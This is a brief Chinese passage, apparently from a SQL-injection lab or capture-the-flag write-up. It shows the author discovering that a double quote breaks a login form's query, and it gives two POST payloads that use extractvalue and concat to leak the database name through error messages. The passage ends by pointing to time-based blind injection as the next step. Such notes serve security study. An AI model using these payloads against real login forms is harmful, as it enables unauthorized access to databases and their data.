我觉得此处应该是双引号。
继续输入俩反斜杠,发现是双引号的锅。
所以直接盘它
uname=uname=admin" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=%40&submit=Submit
下面这样也行:
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
然后就可以考虑时间盲注了